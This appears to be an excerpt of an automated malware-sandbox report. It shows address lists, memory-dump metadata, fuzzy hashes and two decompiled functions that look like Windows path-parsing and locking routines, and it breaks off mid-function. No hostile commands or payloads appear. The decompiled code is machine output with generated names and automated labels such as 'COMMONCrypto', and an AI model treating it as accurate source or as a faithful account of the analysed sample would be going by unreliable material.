0x04c35f46
0x04c35f48
0x04c35f4d
0x00000000
0x04c35f4d
0x04c35dda
0x04c35ddf
0x00000000
0x04c35ddf
0x04c35dd8
0x04c35da7
0x04c35da9
0x04c35dac
0x04c35dae
0x00000000
0x04c35db4
0x04c35db4
0x00000000
0x04c35db4
0x04c35dae
0x04c35d88
0x04c35d8d
0x04c36363
0x04c36369
0x04c3636a
0x04c36370
0x04c36372
0x04c3637a
0x04c3637b
0x04c3637d
0x00000000
0x00000000
0x04c3637f
0x04c36385
0x00000000
0x04c36385
0x04c35d38
0x04c35d3b
0x00000000
0x00000000
0x00000000
0x04c35d3b
0x04c35d27
0x04c35d29
0x00000000
0x00000000
0x00000000
0x04c36360
0x00000000
0x04c36360
0x04c35c10
0x04c35c10
0x04c363da
0x04c363e5
0x04c363e5

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 402c474d1fb415d06e95842f9764a198edcc0b6721c81d3eead4f207a2761112
Instruction ID: 0a17fa23b143f3809a06255a2f3e985d070f015dd3478cd3fb0b324be6acfff8
Opcode Fuzzy Hash: 402c474d1fb415d06e95842f9764a198edcc0b6721c81d3eead4f207a2761112
Instruction Fuzzy Hash: 7F426E75A00219DFDB64CF68C880BA9B7F2FF49305F1581AAD84DEB241D774AA85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 04B84120, Relevance: .4, Instructions: 444
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E04B84120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x4c5d360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E04B9F232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E04B86E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L04B84620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E04B86E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M04B845F8))) {
												case 0:
													_v568 = 0x4b41078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x4b411c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L04B84620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E04BAF720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E04BAF720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E04B652A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E04B7EB70(1, 0x4c579a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E04B7AA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E04BA95D0();
																			L04B877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L04B877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E04BAB640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E04BA3D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E04BAB640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}

0x04b84128
0x04b84135
0x04b8413c
0x04b84141
0x04b84145
0x04b84147
0x04b8414e
0x04b84151
0x04b84159
0x04b8415c
0x04b84160
0x04b84164
0x04b84168
0x04b8416c
0x04b8417f
0x04b84181
0x04b8446a
0x04b8446a
0x04b8418c
0x04b84195
0x04b84199
0x04b84432
0x04b84439
0x04b8443d
0x04b84442
0x04b84447
0x00000000
0x04b8419f
0x04b841a3
0x04b841b1
0x04b841b9
0x04b841bd
0x04b845db
0x04b845db
0x00000000
0x04b841c3
0x04b841c3
0x04b841ce
0x04b841d4
0x04bce138
0x04bce13e
0x04bce169
0x04bce16d
0x04bce19e
0x04bce16f
0x04bce16f
0x04bce175
0x04bce179
0x04bce18f
0x04bce193
0x00000000
0x04bce199
0x00000000
0x04bce199
0x04bce193
0x00000000
0x00000000
0x00000000
0x04b841da
0x04b841da
0x04b841df
0x04b841e4
0x04b841ec
0x04b84203
0x04b84207
0x04bce1fd
0x04b84222
0x04b84226
0x04bce1f3
0x04bce1f3
0x04b8422c
0x04b8422c
0x04b84233
0x04bce1ed
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x04b84239
0x04b84239
0x04b84239
0x04b84239
0x04b84233
0x04b84226
0x04b841ee
0x04b841ee
0x04b841f4
0x04b84575
0x04bce1b1
0x04bce1b1
0x00000000
0x04b8457b
0x04b8457b
0x04b84582
0x04bce1ab
0x00000000
0x00000000
0x00000000
0x00000000
0x04b84588
0x04b84588
0x04b8458c
0x04bce1c4
0x04bce1c4
0x00000000
0x04b84592
0x04b84592
0x04b84599
0x04bce1be
0x00000000
0x00000000
0x00000000
0x00000000
0x04b8459f
0x04b8459f
0x04b845a3
0x04bce1d7
0x04bce1e4
0x00000000
0x04b845a9
0x04b845a9
0x04b845b0
0x04bce1d1
0x00000000
0x00000000
0x00000000
0x00000000
0x04b845b6
0x04b845b6
0x04b845b6
0x00000000
0x04b845b6
0x04b845b0
0x04b845a3
0x04b84599
0x04b8458c
0x04b84582
0x00000000
0x00000000
0x00000000
0x00000000
0x04b841f4
0x04b8423e
0x04b84241
0x04b845c0
0x04b845c4
0x00000000
0x04b845ca
0x04b845ca
0x00000000
0x04bce207
0x04bce20f
0x00000000
0x00000000
0x00000000
0x00000000
0x04b845d1
0x00000000
0x00000000
0x04b845ca
0x00000000
0x04b84247
0x04b84247
0x04b84247
0x04b84249
0x04b84249
0x04b84249
0x04b84251
0x04b84251
0x04b84257
0x04b8425f
0x04b8426e
0x04b84270
0x04b8427a
0x04bce219
0x04bce219
0x04b84280
0x04b84282
0x04b84456
0x04b845ea
0x00000000
0x04b845f0
0x04bce223
0x00000000
0x04bce223
0x04b8445c
0x04b8445c
0x00000000
0x04b8445c
0x00000000
0x04b84288
0x04b8428c
0x04bce298
0x04b84292
0x04b84292
0x04b8429e
0x04b842a3
0x04b842a7
0x04b842ac
0x04bce22d
0x04b842b2
0x04b842b2
0x04b842b9
0x04b842bc
0x04b842c2
0x04b842ca
0x04b842cd
0x04b842cd
0x04b842d4
0x04b8433f
0x04b8433f
0x04b842d6
0x04b842d6
0x04b842d9
0x04b842dd
0x04b842eb
0x04bce23a
0x04b842f1
0x04b84305
0x04b8430d
0x04b84315
0x04b84318
0x04b8431f
0x04b84322
0x04b8432e
0x04b8433b
0x04b8433b
0x00000000
0x04b8432e
0x04b842eb
0x04b8434c
0x04b8434e
0x04b84352
0x04b84359
0x04b8435e
0x04b84361
0x04b8436e
0x04b8438a
0x04b8438e
0x04b84396
0x04b8439e
0x04b843a1
0x04b843ad
0x04b843bb
0x04b843bb
0x04b843ad
0x04b8436e
0x04b843bf
0x04b843c5
0x04b84463
0x04b84463
0x04b843ce
0x04b843d5
0x04b843d9
0x04b843df
0x04b84475
0x04b84479
0x04b84491
0x04b84491
0x04b84479
0x04b843e5
0x04b843eb
0x04b843f4
0x04b843f6
0x04b843f9
0x04b843fc
0x04b843ff
0x04b844e8
0x04b844ed
0x04b844f3
0x04bce247
0x00000000
0x04b844f9
0x04b84504
0x04b84508
0x04b8450f
0x04bce269
0x00000000
0x04b84515
0x04b84519
0x04b84531
0x04b84534
0x04b84537
0x04b8453e
0x04b84541
0x04b8454a
0x04bce255
0x04bce255
0x04bce25b
0x04bce25e
0x04bce261
0x04bce261
0x04b84555
0x04b84559
0x04b8455d
0x04bce26d
0x04bce270
0x04bce274
0x04bce27a
0x04bce27d
0x04bce28e
0x04bce28e
0x04b84563
0x04b84563
0x04b84569
0x04b84569
0x00000000
0x04b8455d
0x04b8450f
0x00000000
0x04b844f3
0x04b843ff
0x04b84405
0x04b84405
0x04b84405
0x04b842ac
0x04b8428c
0x04b84282
0x04b84407
0x04b8440d
0x04bce2af
0x04bce2af
0x04b84413
0x04b84413
0x00000000
0x04b841d4
0x00000000
0x04b841c3
0x04b841bd
0x04b84415
0x04b84415
0x04b84416
0x04b84417
0x04b84429
0x04b8416e
0x04b8416e
0x04b84175
0x04b84498
0x04b8449f
0x04bce12d
0x00000000
0x04bce133
0x00000000
0x04bce133
0x04b844a5
0x04b844a5
0x04b844aa
0x00000000
0x04b844bb
0x04b844ca
0x04b844d6
0x04b844d7
0x04b844d8
0x04b844e3
0x04b844e3
0x04b844aa
0x04b8417b
0x04b8417b
0x04b8417b
0x00000000
0x04b8417b
0x04b84175
0x00000000

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65720dc7dedef2d5dda44e2ffbe985eef4d5fd57179d246e29f52f7e59e7c3a3
Instruction ID: 925923a08fdec0f3fc0bfae976057066b0a733507c89a52d0aa8daf1acb0d01a
Opcode Fuzzy Hash: 65720dc7dedef2d5dda44e2ffbe985eef4d5fd57179d246e29f52f7e59e7c3a3
Instruction Fuzzy Hash: BEF16E70608212CBCB24EF19C480A7AB7E1FF88718F1449AEF496CB250F734E991DB52

Uniqueness

Uniqueness Score: -1.00%

Function 04B920A0, Relevance: .4, Instructions: 420
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E04B920A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0x4c58714; // 0x0
						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = E04B92EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = E04B92EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E04B658EC(_t240);
									_t221 =  *0x4c55cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0x4c55cac; // 0x16
							L7:
							if(_t133 != 0) {
								__eflags = _t133 & 0x00001000;
								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E04BA4A2C(0x4c56e40, 0x4ba4b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = E04B87D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0x4b45c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = E04B9F6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = E04B9F6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E04BE7016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L04B82400(_t267 + 0x20);
															}
															L04B82400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E04B92397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
								if( *((char*)(_t267 + 0xb)) != 0) {
									E04B82280(_t134, 0x4c58608);
									__eflags =  *0x4c56e48 - _t253; // 0xa9afa0
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										E04B7FFB0(_t198, _t241, 0x4c58608);
										__eflags = _t253;
										if(_t253 != 0) {
											L04B877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0x4c56e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0x4c58608; // 0x0
								while(1) {
									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t73 = _t231 + 1; // 0x1
									_t210 = _t73;
									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
										L92:
										_t133 = E04B96B90(_t210,  &_v64);
										_t262 =  *0x4c58608; // 0x0
										L93:
										_t231 = _t262;
										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E04B9E180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										E04BA97C0();
										_t231 = _v68;
									}
									_v72 = 0;
									_v24 =  *( *[fs:0x18] + 0x24);
									_v16 = 3;
									_v28 = 0;
									__eflags = _t231 & 0x00000002;
									if((_t231 & 0x00000002) == 0) {
										_v32 =  &_v36;
										_t174 = _t231 >> 4;
										__eflags = 1 - _t174;
										_v20 = _t174;
										asm("sbb ecx, ecx");
										_t210 = 3 |  &_v36;
										__eflags = _t174;
										if(_t174 == 0) {
											_v20 = 0xfffffffe;
										}
									} else {
										_v32 = 0;
										_v20 = 0xffffffff;
										_v36 = _t231 & 0xfffffff0;
										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
										_v72 =  !(_t231 >> 2) & 0xffffff01;
									}
									asm("lock cmpxchg [edi], esi");
									_t262 = _t231;
									__eflags = _t262 - _t231;
									if(_t262 != _t231) {
										goto L92;
									} else {
										__eflags = _v72;
										if(_v72 != 0) {
											E04BA006A(0x4c58608, _t210);
										}
										__eflags =  *0x7ffe036a - 1;
										if(__eflags <= 0) {
											L89:
											_t133 =  &_v16;
											asm("lock btr dword [eax], 0x1");
											if(__eflags >= 0) {
												goto L93;
											} else {
												goto L90;
											}
											do {
												L90:
												_push(0);
												_push(0x4c58608);
												E04BAB180();
												_t133 = _v24;
												__eflags = _t133 & 0x00000004;
											} while ((_t133 & 0x00000004) == 0);
											goto L93;
										} else {
											_t218 =  *0x4c56904; // 0x400
											__eflags = _t218;
											if(__eflags == 0) {
												goto L89;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags = _v16 & 0x00000002;
												if(__eflags == 0) {
													goto L89;
												}
												asm("pause");
												_t218 = _t218 - 1;
												__eflags = _t218;
												if(__eflags != 0) {
													continue;
												}
												goto L89;
											}
											goto L89;
										}
									}
								}
							}
							L10:
							_t229 =  *0x4c56e48; // 0xa9afa0
							_v72 = _t229;
